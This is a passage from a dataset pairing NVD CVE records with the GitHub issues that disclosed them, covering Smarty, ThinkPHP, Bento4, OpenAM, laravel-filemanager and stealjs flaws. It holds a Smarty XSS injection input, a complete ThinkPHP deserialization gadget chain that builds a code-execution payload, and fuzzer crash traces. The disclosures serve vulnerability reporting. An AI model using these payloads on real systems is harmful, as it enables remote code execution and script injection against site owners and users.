},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/UniSharp/laravel-filemanager/issues/1150"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1320186966"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1825310417"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/UniSharp/laravel-filemanager/issues/1150"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1320186966"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1825310417"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:unisharp:laravel_filemanager:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F55D5755-7EE5-4205-A976-12D1DBAB33B0",
"versionEndExcluding": null,
"versionEndIncluding": "2.5.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1825310417 | null | github.com | [
"UniSharp",
"laravel-filemanager"
] | I do not use this package, but I seen this in our firewall blocked list. My guess is that there is some sort of vulnerability.

| Directory traversal vulnerability (CVE-2022-40734) | https://api.github.com/repos/UniSharp/laravel-filemanager/issues/1150/comments | 19 | 2022-06-22T04:18:30Z | 2024-03-28T15:31:00Z | https://github.com/UniSharp/laravel-filemanager/issues/1150 | 1,279,489,454 | 1,150 | 4,144 |
CVE-2018-25047 | 2022-09-15T00:15:09.580 | In Smarty before 3.1.47 and 4.x before 4.2.1, libs/plugins/function.mailto.php allows XSS. A web page that uses smarty_function_mailto, and that could be parameterized using GET or POST input parameters, could allow injection of JavaScript code by a user. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugs.gentoo.org/870100"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/smarty-php/smarty/issues/454"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://github.com/smarty-php/smarty/releases/tag/v3.1.47"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes"
],
"url": "https://github.com/smarty-php/smarty/releases/tag/v4.2.1"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00002.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://security.gentoo.org/glsa/202209-09"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugs.gentoo.org/870100"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/smarty-php/smarty/issues/454"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://github.com/smarty-php/smarty/releases/tag/v3.1.47"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://github.com/smarty-php/smarty/releases/tag/v4.2.1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00002.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.gentoo.org/glsa/202209-09"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:smarty:smarty:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2C07B998-ABE8-4F99-8A25-EEEBBC27599E",
"versionEndExcluding": "3.1.47",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:smarty:smarty:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B4C5DBC8-BA50-48A6-965D-2BC0750735CE",
"versionEndExcluding": "4.2.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "4.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/smarty-php/smarty/issues/454 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"smarty-php",
"smarty"
] | I found a bug in the **Smarty package**, specifically in the **smarty_function_mailto($params)** function.
Remote exploitation of such vulnerability is unlikely, but it is still advisable to take it into account.
A web page that uses this function and that could be parameterized using GET or POST input parameters could cause the injection of JavaScript code of a malicious user and cause cross-site scripting attacks.
Using the following code you can inject JavaScript code into the **smarty_function_mailto** function.
===============================================================
$params = array(
'encode'=>'javascript',
'address'=>'iricartb@gmail.com">iricartb@gmail.com</a>\'); alert("- JavaScript Injected -"); //',
);
echo smarty_function_mailto($params);
===============================================================
 | smarty_function_mailto - JavaScript injection in eval function | https://api.github.com/repos/smarty-php/smarty/issues/454/comments | 3 | 2018-06-18T16:31:00Z | 2022-12-27T11:00:26Z | https://github.com/smarty-php/smarty/issues/454 | 333,345,886 | 454 | 4,145 |
CVE-2022-38352 | 2022-09-15T02:15:09.223 | ThinkPHP v6.0.13 was discovered to contain a deserialization vulnerability via the component League\Flysystem\Cached\Storage\Psr6Cache. This vulnerability allows attackers to execute arbitrary code via a crafted payload. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/top-think/framework/issues/2749"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/top-think/framework/issues/2749"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thinkphp:thinkphp:6.0.13:*:*:*:*:*:*:*",
"matchCriteriaId": "DDD39D80-F4FD-4FDA-B294-E26CF148F865",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"502"
] | 502 | https://github.com/top-think/framework/issues/2749 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"top-think",
"framework"
] | Any method of any class, where eval is called to execute php code, thereby executing php and writing to a file.
```php
<?php
namespace League\Flysystem\Cached\Storage{
class Psr6Cache{
private $pool;
protected $autosave = false;
public function __construct($exp)
{
$this->pool = $exp;
}
}
}
namespace think\log{
class Channel{
protected $logger;
protected $lazy = true;
public function __construct($exp)
{
$this->logger = $exp;
$this->lazy = false;
}
}
}
namespace think{
class Request{
protected $url;
public function __construct()
{
$this->url = '<?php system(\'calc\'); exit(); ?>';
}
}
class App{
protected $instances = [];
public function __construct()
{
$this->instances = ['think\Request'=>new Request()];
}
}
}
namespace think\view\driver{
class Php{}
}
namespace think\log\driver{
class Socket{
protected $config = [];
protected $app;
protected $clientArg = [];
public function __construct()
{
$this->config = [
'debug'=>true,
'force_client_ids' => 1,
'allow_client_ids' => '',
'format_head' => [new \think\view\driver\Php,'display'], # 利用类和方法
];
$this->app = new \think\App();
$this->clientArg = ['tabid'=>'1'];
}
}
}
namespace{
$c = new think\log\driver\Socket();
$b = new think\log\Channel($c);
$a = new League\Flysystem\Cached\Storage\Psr6Cache($b);
echo urlencode(serialize($a));
}
``` | There is a new exploit chain for the deserialization vulnerability of thinkphp 6.0.13 | https://api.github.com/repos/top-think/framework/issues/2749/comments | 0 | 2022-08-14T15:26:02Z | 2024-03-01T08:25:01Z | https://github.com/top-think/framework/issues/2749 | 1,338,277,889 | 2,749 | 4,146 |
CVE-2022-40737 | 2022-09-15T04:15:24.610 | An issue was discovered in Bento4 through 1.6.0-639. A buffer over-read exists in the function AP4_StdcFileByteStream::WritePartial located in System/StdC/Ap4StdCFileByteStream.cpp, called from AP4_ByteStream::Write and AP4_HdlrAtom::WriteFields. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/756"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/756"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axiosys:bento4:*:*:*:*:*:*:*:*",
"matchCriteriaId": "180AEBD6-AF89-4F0F-856E-D8B977C762C0",
"versionEndExcluding": null,
"versionEndIncluding": "1.6.0-639",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"125"
] | 125 | https://github.com/axiomatic-systems/Bento4/issues/756 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"axiomatic-systems",
"Bento4"
] | Hello, I use fuzzer to test bianry mp4split, and found some vulnerabilities,the following is the details.
# Bug1
```
root@c511e4bf49bc:/mp4split/mp4split# ./mp4split FishFuzz/crashes/id:000000,sig:06,src:000011,op:flip1,pos:31240,1216870
=================================================================
==2589461==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000000cfdb21 at pc 0x0000009a6c6c bp 0x7ffec6ff0d60 sp 0x7ffec6ff0510
READ of size 237 at 0x000000cfdb21 thread T0
#0 0x9a6c6b in __interceptor_fwrite.part.57 /llvm/llvm-project/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1143
#1 0x7ab8fa in AP4_StdcFileByteStream::WritePartial(void const*, unsigned int, unsigned int&) (/mp4split/mp4split/mp4split+0x7ab8fa)
#2 0x471cf7 in AP4_ByteStream::Write(void const*, unsigned int) (/mp4split/mp4split/mp4split+0x471cf7)
#3 0x4d1be1 in AP4_HdlrAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x4d1be1)
#4 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f)
#5 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213)
#6 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f)
#7 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213)
#8 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f)
#9 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213)
#10 0x40d872 in main (/mp4split/mp4split/mp4split+0x40d872)
#11 0x7f7ce8910c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
#12 0x407689 in _start (/mp4split/mp4split/mp4split+0x407689)
0x000000cfdb21 is located 63 bytes to the left of global variable 'AP4_GlobalOptions::g_Entries' defined in '/Bento4-1.5.1-629/Source/C++/Core/Ap4Utils.cpp:37:56' (0xcfdb60) of size 8
0x000000cfdb21 is located 0 bytes to the right of global variable 'AP4_String::EmptyString' defined in '/Bento4-1.5.1-629/Source/C++/Core/Ap4String.cpp:39:18' (0xcfdb20) of size 1
'AP4_String::EmptyString' is ascii string ''
SUMMARY: AddressSanitizer: global-buffer-overflow /llvm/llvm-project/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1143 in __interceptor_fwrite.part.57
Shadow bytes around the buggy address:
0x000080197b10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x000080197b20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f9
0x000080197b30: f9 f9 f9 f9 00 00 00 f9 f9 f9 f9 f9 00 00 00 f9
0x000080197b40: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 f9 f9 f9
0x000080197b50: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 f9 f9 f9
=>0x000080197b60: f9 f9 f9 f9[01]f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9
0x000080197b70: f9 f9 f9 f9 00 00 00 f9 f9 f9 f9 f9 00 00 00 00
0x000080197b80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x000080197b90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x000080197ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x000080197bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==2589461==ABORTING
```
# Bug2
```
root@c511e4bf49bc:/mp4split/mp4split# ./mp4split FishFuzz/crashes/id:000001,sig:06,src:000011,op:flip1,pos:31415,1226899
AddressSanitizer:DEADLYSIGNAL
=================================================================
==2659777==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000096b50a bp 0x7ffda4354030 sp 0x7ffda4353e70 T0)
==2659777==The signal is caused by a READ memory access.
==2659777==Hint: address points to the zero page.
#0 0x96b50a in AP4_DescriptorListWriter::Action(AP4_Descriptor*) const (/mp4split/mp4split/mp4split+0x96b50a)
#1 0x88e625 in AP4_EsDescriptor::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x88e625)
#2 0x896a7f in AP4_Expandable::Write(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x896a7f)
#3 0x4bdbcd in AP4_EsdsAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x4bdbcd)
#4 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f)
#5 0x61dbf8 in AP4_SampleEntry::Write(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x61dbf8)
#6 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f)
#7 0x676f0b in AP4_StsdAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x676f0b)
#8 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f)
#9 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213)
#10 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f)
#11 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213)
#12 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f)
#13 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213)
#14 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f)
#15 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213)
#16 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f)
#17 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213)
#18 0x40d872 in main (/mp4split/mp4split/mp4split+0x40d872)
#19 0x7f1636a2cc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
#20 0x407689 in _start (/mp4split/mp4split/mp4split+0x407689)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/mp4split/mp4split/mp4split+0x96b50a) in AP4_DescriptorListWriter::Action(AP4_Descriptor*) const
==2659777==ABORTING
```
# poc
[crash.zip](https://github.com/axiomatic-systems/Bento4/files/9565816/crash.zip)
# environment
Ubuntu 18.04(docker)
# credit
Yuhang Huang ([NCNIPC of China](http://www.nipc.org.cn/)),(Zhongguancun Laboratory)
Han Zheng ([NCNIPC of China](http://www.nipc.org.cn/), [Hexhive](http://hexhive.epfl.ch/)),(Zhongguancun Laboratory)
Thansk for your time! | there are some vulnerabilities in binary mp4split | https://api.github.com/repos/axiomatic-systems/Bento4/issues/756/comments | 2 | 2022-09-14T11:20:27Z | 2023-06-26T06:40:26Z | https://github.com/axiomatic-systems/Bento4/issues/756 | 1,372,814,057 | 756 | 4,147 |
CVE-2022-31735 | 2022-09-15T05:15:08.883 | OpenAM Consortium Edition version 14.0.0 provided by OpenAM Consortium contains an open redirect vulnerability (CWE-601). When accessing an affected server through some specially crafted URL, the user may be redirected to an arbitrary website. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "vultures@jpcert.or.jp",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/openam-jp/openam/issues/259"
},
{
"source": "vultures@jpcert.or.jp",
"tags": [
"Third Party Advisory"
],
"url": "https://jvn.jp/en/vu/JVNVU99326969/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/openam-jp/openam/issues/259"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://jvn.jp/en/vu/JVNVU99326969/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:osstech:openam:*:*:*:*:consortium:*:*:*",
"matchCriteriaId": "1E5893F0-D7DF-46D8-A751-E965D6ADAC4A",
"versionEndExcluding": null,
"versionEndIncluding": "13.0.0-183",
"versionStartExcluding": null,
"versionStartIncluding": "13.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:osstech:openam:*:*:*:*:consortium:*:*:*",
"matchCriteriaId": "893EC9F5-1FF1-41C2-9C41-B5B2697B15DE",
"versionEndExcluding": null,
"versionEndIncluding": "14.2.0-2",
"versionStartExcluding": null,
"versionStartIncluding": "14.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"601"
] | 601 | https://github.com/openam-jp/openam/issues/259 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"openam-jp",
"openam"
] | ## Description
OpenAM (OpenAM Consortium Edition) has an open redirect vulnerability in logout URL.
After performing some steps, accessing the logout URL with a malformed parameter can redirect the user to an arbitrary URL. | Open Redirect Vulnerability | https://api.github.com/repos/openam-jp/openam/issues/259/comments | 0 | 2022-09-13T01:23:52Z | 2022-09-15T02:04:45Z | https://github.com/openam-jp/openam/issues/259 | 1,370,718,149 | 259 | 4,148 |
CVE-2022-37257 | 2022-09-15T13:15:09.653 | Prototype pollution vulnerability in function convertLater in npm-convert.js in stealjs steal 2.2.4 via the requestedVersion variable in npm-convert.js. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "http://steal.com"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "http://stealjs.com"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/npm-convert.js#L362"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/npm-convert.js#L371"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/issues/1526"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "http://steal.com"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "http://stealjs.com"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/npm-convert.js#L362"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/npm-convert.js#L371"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/issues/1526"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:stealjs:steal:2.2.4:*:*:*:*:node.js:*:*",
"matchCriteriaId": "3819AF82-351A-415D-B7D8-60208158D5E3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"1321"
] | 1321 | https://github.com/stealjs/steal/issues/1526 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"stealjs",
"steal"
] | Prototype pollution vulnerability in function convertLater in npm-convert.js in stealjs steal 2.2.4 via the requestedVersion variable in npm-convert.js.
The prototype pollution vulnerability can be mitigated with several best practices described here:
https://learn.snyk.io/lessons/prototype-pollution/javascript/ | [CVE-2022-37257]/prototype-pollution found in npm-convert.js | https://api.github.com/repos/stealjs/steal/issues/1526/comments | 0 | 2022-09-14T09:08:10Z | 2022-09-14T09:08:10Z | https://github.com/stealjs/steal/issues/1526 | 1,372,628,760 | 1,526 | 4,149 |
CVE-2022-37266 | 2022-09-15T13:15:09.697 | Prototype pollution vulnerability in function extend in babel.js in stealjs steal 2.2.4 via the key variable in babel.js. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/babel.js#L29165"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/babel.js#L29169"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/issues/1535"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/babel.js#L29165"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/ext/babel.js#L29169"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/stealjs/steal/issues/1535"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:stealjs:steal:2.2.4:*:*:*:*:node.js:*:*",
"matchCriteriaId": "3819AF82-351A-415D-B7D8-60208158D5E3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"1321"
] | 1321 | https://github.com/stealjs/steal/issues/1535 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"stealjs",
"steal"
] | Prototype pollution vulnerability in function extend in babel.js in stealjs steal 2.2.4 via the key variable in babel.js.
The prototype pollution vulnerability can be mitigated with several best practices described here: https://learn.snyk.io/lessons/prototype-pollution/javascript/
| [CVE-2022-37266] Prototype pollution found in babel.js | https://api.github.com/repos/stealjs/steal/issues/1535/comments | 0 | 2022-09-14T09:49:39Z | 2022-09-14T09:49:39Z | https://github.com/stealjs/steal/issues/1535 | 1,372,688,015 | 1,535 | 4,150 |
CVE-2022-37262 | 2022-09-15T16:15:10.323 | A Regular Expression Denial of Service (ReDoS) flaw was found in stealjs steal 2.2.4 via the source and sourceWithComments variable in main.js. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
